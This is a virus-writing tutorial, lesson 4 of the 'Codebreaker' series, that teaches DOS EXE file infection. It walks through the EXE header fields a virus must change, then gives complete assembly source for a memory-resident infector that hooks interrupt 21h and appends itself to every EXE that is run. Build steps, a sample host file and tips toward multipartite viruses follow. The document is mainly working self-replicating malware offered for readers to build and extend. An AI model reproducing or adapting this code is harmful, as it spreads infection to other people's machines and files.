|
|
| Lesson
1 Lesson 2 Lesson 3 |
Now onto the 4th lesson, EXE file infection. Boy, the topics never seem to get any easier, do they? The difficult aspect of EXE infection is that there is no ONE technique to cover all forms of EXE infection. I will, therefore, keep to the basics in this tutorial and in later articles, address different techniques which you can use.
What is an EXE file?
One of the first things that we need to do is understand what an EXE file is and more importantly what it looks like. Quite simply, an EXE file is an improvement over the COM file format in that allows the program size to exceed one segment (64k). COM programs are limited to 64K, including 256 bytes for the PSP. EXE files, on the other hand can occupy a much larger space by using more than one segment. The limit on an EXE file's size is the amount of memory/hard drive space you have. There are other characteristics that differ between the EXE and COM formats. In a COM file, the stack is automatically defined, whereas, in an EXE file, you need to initialize it yourself. This is probably the single most difficult concept to grasp when writing EXE files, the stack. Care must be taken that you define the stack large enough to handle all of the push and pop instructions that your program will use. If your stack is to small, your program is sure to crash. The next difference in the two file formats is the initializing of data segment. In a COM file, the data segment is defined as an area within the code segment. Since a COM file only uses one segment anyway, the data, code, and stack segments can all fall right together. Very convienient right? Well, in an EXE file, after the program loader puts the file in memory, both DS and ES contain the address of the PSP! Remember that! Always remember to load the address of the data segment into ds when coding EXE files.
At the heart of the EXE file format lies the EXE header. The EXE header is a minimum of 32 bytes that is used to describe a multitude of information about how the program needs to be loaded. Why I say that the header is the heart of the EXE file format, is that a virus which attacks EXE files, needs to utilize practically all of the information in the header. Therefore, pay attention so that you thoroughly understand this concept.
Let's take a look at the EXE header format:
The length of each element in the EXE header is 2 bytes (1 WORD). The descriptive names of each element in the header are the traditional names that have been used size the EXE file was created. You can give them whatever symbolic name you want to in you virus.
EXE Header Format
Offset Length Content Description
-----------------------------------------------------------------------
0h 2 4Dh 5Ah EXE file signature "MZ"
2h 2 PartPag Length of last non-full
page.
4h 2 PagCnt Length of program in 512
byte pages
6h 2 ReloCnt Number of elements in
the relocation table
8h 2 HdrSize Header length in
paragraphs
0Ah 2 MinMem Minimum memory left in
paragraphs.
0Ch 2 MaxMem Maximum memory left in
paragraphs.
0Eh 2 ReloSS Segment correction for
stack (SS)
10h 2 ExeSP Value of stack pointer
(SP)
12h 2 ChkSum Checksum
14h 2 ExeIP Value of instruction
pointer (IP)
16h 2 ReloCS Segment correction for
CS
18h 2 TablOff Offset for the first
relocation element
1Ah 2 Overlay Overlay numberAt a prompt, type:
For an easier to read version of the same information, use SPo0ky's EXE header reader for the following results:c:\>debug someExe.eww -d ??:0100 4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00 MZ...... ....... ??:0110 00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71 ........>......q ??:0120 6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00 jr..............
EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000
Relocation Table Entries:
0000:0001Now, let's take a look at the individual contants of the EXE header and identify their function in the infection process.
EXE signature
The first word in the header is the traditional EXE file signature "MZ". These are the initials of Mark Zbikowski, the programmer who designed the EXE file format. Obviously, you already know from my last tutorial that you can use this unique signature to identify whether or not the file is of the EXE format.
PartPag and PagCnt (need to be modified)
PartPag and PagCnt make up the entire file size including header. PageCnt, as the name implies, is the length of the file expressed in 512 byte pages. PartPag is the amount of bytes that are on the last page of PageCnt. PartPag is expressed as length of the file mod 512. Mod. You better learn this concept now, because it will follow you on into higher programming languages such as C++.
The mod (%) is the remainder left over after division has taken place in non-floating point numbers. Simple enough. PartPag and PagCnt will need to be modified to allow for the inclusion of you virus code.5 % 2 = 1 5 / 2 = 2
ReloCnt
The next item in the header represents the number of items in the relocation table. What the hell is a relocation table? A relocation table contains two words (offset,segment) for each element in the program that needs to be adjusted to account for segment location. You can skip over this because you will not have to make any modifications here but...
In the relocation table, both words are read and a relative segment address is computed by the sum of the loading segment address (usually PSP seg + 10h) and the segment address to the element that needs adjusting. The loading segment is then added to the element in memory at the relative segment address/offset.
HdrSize
The next element of the header is the header size. Quite self explanatory, the HdrSize holds the size of the header in 16-byte paragraphs. With the information that you have thus far seen, you can determine the actual bare program size with the equation:
You will also not have to fool with the header size.Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag)
MinMem & MaxMem
Shall we also have another obvious two contents: MinMem and MaxMem? These two values are used to allocate the amount of memory for the program.
ReloSS & ExeSP (need to be modified)
ReloSS and ExeSP are two items that need to be changed to account for the addition of code that you have just appended. ReloSS added with the starting segment address will give you your SS register.
Checksum (should be modified)
The Checksum item is the traditional place to store an infection marker.
ReloCS & ExeIP (need to be modified)
ReloCS is definitely an important item. The item stored here, along with the ExeIP, represents the beginning address to our virus code. This value will be initially saved from the host program so that it can be recalled and control returned back to the host.
TablOff
This is the offset to the first relocation element in the file.
Overlay
If this is the program main module, the value should be zero.
Below is a simple resident EXE infector. I choose to include a resident virus rather then a direct action infector, because I believe that, if you can write a resident EXE infector, making it non-resident would be a piece of cake. One thing that I was considering to do was to follow the modular style of coding that I used in the last tutorial. One trend that I was seeing in many viruses was that people were simply copying the code. After Slam #4 was released, you have no idea how many EXE infectors started to hit the scene that were essentially a word for word copy. Whatever. In the end, I decided to include the virus below so that you can see everything working in one virus, rather than the modular style of instruction. I am not sure which way is better, so I will probably continue to switch back and forth between styles. Another thing, while I am in the preaching mode, from now on, I will not be explaining the most basic concepts of assembly. If you have been following along with the tutorials, you should understand every concept that is in this tutorial. Really, the only new aspect that you need to be aware of with EXE infection is that you need to change certain values in the header to accomodate your virus. You already know how to do this. In the beginning tutorials, you played around with elements of the DTA. Well, you are going to be doing the same thing with the header, reading it into a buffer and reading and modifying the values that I have pointed out above.
.286
virus segment
assume cs:virus, ds:virus, es:virus
jumps
org 0CBh
start:
call delta ;Calculate delta offset
delta:
pop bp
sub bp,offset delta
push ds ;save PSP address
push cs cs
pop ds es
mov ax,0CBCBh ;our "Codebreaker" residency check
int 21h ;>what is CB?
cmp bx,0C001h ;>C001!! :o)
je restore ;its already resident
pop ds
push ds ;PSP address back into DS
;--------------------------------------------------
mov ax,ds ;MCB residency
dec ax ;For further clarification
mov ds,ax ;read Codebreaker Tutorial 3
sub word ptr ds:[3],40h
sub word ptr ds:[12h],40h
xor ax,ax
mov ds,ax
dec word ptr ds:[413h]
mov ax,word ptr ds:[413h]
shl ax,6
mov es,ax
push cs
pop ds
lea si,[bp+start]
xor di,di
mov cx,the_end - start
rep movsb
;--------------------------------------------------
xor ax,ax ;Setting of interrupts
mov ds,ax ;For further clarification
;read Codebreaker Tutorial 3
mov ax,es
mov bx,new_int21h-start
cli
xchg bx,word ptr ds:[21h*4]
xchg ax,word ptr ds:[21h*4+2]
mov word ptr es:[old_int21h-start],bx
mov word ptr es:[old_int21h+2-start],ax
sti
;--------------------------------------------------
push cs cs
pop ds es
mov ah,9 ;Warns the poor shmuck
lea dx,[bp+message]
int 21h
restore: ;Control handed back
lea si,[bp+old_ip] ;Restore orig IP
lea di,[bp+original_ip]
mov cx,4
rep movsw
; Now for a clarification of the next four lines. At the beginning of
; the virus DS contains the address of the PSP. We now restore the
; address from the stack, place the address in ES. Then add 10h to
; skip over the PSP. Skip over the PSP(100h) with 10h? Sounds a little
; fishy, right? Well, remember that when you add 10h to AX, you are
; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)
pop ds
mov ax,ds
mov es,ax
add ax,10h
add word ptr cs:[bp+original_cs],ax ;Orig CS
cli
add ax,word ptr cs:[bp+original_ss] ;Orig SS
mov ss,ax
mov sp,word ptr cs:[bp+original_sp] ;Orig SP
sti
db 0eah ;jump to to it
original_ip dw ? ;
original_cs dw ?
original_ss dw ?
original_sp dw ?
new_int21h: ;our int 21h handler
pushf ;push the flags
cmp ax,0CBCBh ;residency check
jne no_install_check
mov bx,0C001h ;already resident
popf ;restore all flags
iret ;return
no_install_check:
cmp ah,4bh ;check if execute
je infect
return:
popf ;restore all flags
db 0eah ;jmp to orig int 21h
old_int21h dd ?
infect:
pusha ;only 286, saves all gen reg
push ds
push es
call tsr_delta
tsr_delta:
pop bp ;a tsr delta offset %-)
sub bp,offset tsr_delta
mov ax,3d02h ;open file in DS:DX
int 21h
jc exit
xchg ax,bx ;file handle to bx
push cs cs
pop ds es
mov ah,3fh ;Read the target header
lea dx,[bp+header] ;into our buffer
mov cx,1ch
int 21h
cmp word ptr cs:[bp+header],'ZM' ;check if its an EXE
je ok
cmp word ptr cs:[bp+header],'MZ'
je ok
jmp close
ok:
cmp word ptr cs:[bp+header+12h],'BC' ;Checksum value checked for
je close ;previous infection
mov word ptr cs:[bp+header+12h],'BC' ;Mark it as infected
mov ax,word ptr cs:[bp+header+14h] ;Save orig ExeIP
mov word ptr cs:[bp+old_ip],ax ;Store in our buffer
mov ax,word ptr cs:[bp+header+16h] ;Save orig ReloCS
mov word ptr cs:[bp+old_cs],ax
mov ax,word ptr cs:[bp+header+0eh] ;Save orig ReloSS
mov word ptr cs:[bp+old_ss],ax
mov ax,word ptr cs:[bp+header+10h] ;Save orig ExeSP
mov word ptr cs:[bp+old_sp],ax
mov ax,4202h ;Set pointer to end of file
xor cx,cx
xor dx,dx
int 21h
push ax dx ;Save EOF results
;Calculate new CS:IP, we set
;it to the EOF (this is where
;we will attach our virus)
mov cx,16 ;Convert filesize into 16 byte
div cx ;paragraphs
sub ax,word ptr cs:[bp+header+8] ;Substract Header size from
;filesize to get the image
;(code/data) size.
;save:
mov word ptr cs:[bp+header+14h],dx ;New ExeIP
mov word ptr cs:[bp+header+16h],ax ;New ReloCS
pop dx ax ;restore saved filesize
add ax,the_end - start ;Add virus size to file size
adc dx,0 ;Adds carry to DX
mov cx,512 ;Calculate amount of pages
div cx
cmp dx,0
je no_remainder
inc ax ;if remainder, add 1
no_remainder:
mov word ptr cs:[bp+header+4],ax ;New PageCnt
mov word ptr cs:[bp+header+2],dx ;New PartPag
mov ah,40h ;write the virus to the EOF
lea dx,[bp+start]
mov cx,the_end - start
int 21h
mov ax,4200h ;Send pointer to beginning
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;Write the new header
lea dx,[bp+header]
mov cx,1ch
int 21h
mov al,7
int 29h ; just a BEEEEEPPP
close:
mov ah,3eh ;close file
int 21h
exit:
pop es
pop ds
popa
jmp return
old_ip dw offset exit_prog
old_cs dw 0
old_ss dw 0
old_sp dw 0fffeh
header db 1ch dup(?) ;Buffer for header
message db 10,13,10,13
db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
db '- has been installed in your computers memory and will from now on infect any -',10,13
db '- EXE file that you execute. -',10,13
db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus. -',10,13,10,13
db ' - www.codebreakers.org -',10,13,'$'
the_end:
exit_prog:
mov ax,4c00h ;Request terminate program
int 21h
virus ends
end startIn order to see the above virus work. Cut the virus out of this
file and save it in a file exevir.asm.
At a prompt with TASM/TLINK in the same directory, type:
Use the myexe.exe (below) as the host program. With both of the programs in the same directory, execute the virus, then execute the host program. If you look at the filesize using the (dir)ectory command, you will see that it has increased in length. Test this virus in a MSDOS box from windows and when you exit out of the MSDOS box, the virus will be gone. If you check the header now, you will be able to see the changes made after infection. Take a look at that beautiful "CB" infection marker.c:\>tasm exevir.asm c:\>tlink exevir.obj
To write the definitive guide to all forms of EXE infection, I would need to quit my day job (which I've thought of doing) and just write a book. In the end it is better to have a bunch of installments attacking each issue and facet of virus writing. Look for the future Codebreaker tutorials become much more specific and advanced. If you can understand how to infect COM and EXE files, along with what role encryption and polymorphism can aid in virus effectivness, you are well on you way to making some really awesome creations. The only thing that you need to add from here is some boot infection techniques to the virus and watch out, you'll have a decent multipartide virus. I guess my one piece of advice now is to read code and absorb it. Start to become critical of others code and use that knowledge and judgement to develope your own style. Enough preaching!??:0100 4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00 MZZ..... ....... ??:0110 00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71 ..CB....>......q ??:0120 6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00 jr..............
Have fun!
Good luck!
Horny Toad
SAMPLE PROGRAMS USED IN TUTORIAL
In order to extract this sample program, cut it out of this file and paste it into a file named "myexe.txt".
At the prompt, type:
You will then have a sample infectable EXE file.c:\>debug < myexe.txt c:\>rename myexe.exd myexe.exe
N MYEXE.EXD E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 E 0310 00 RCX 0211 W Q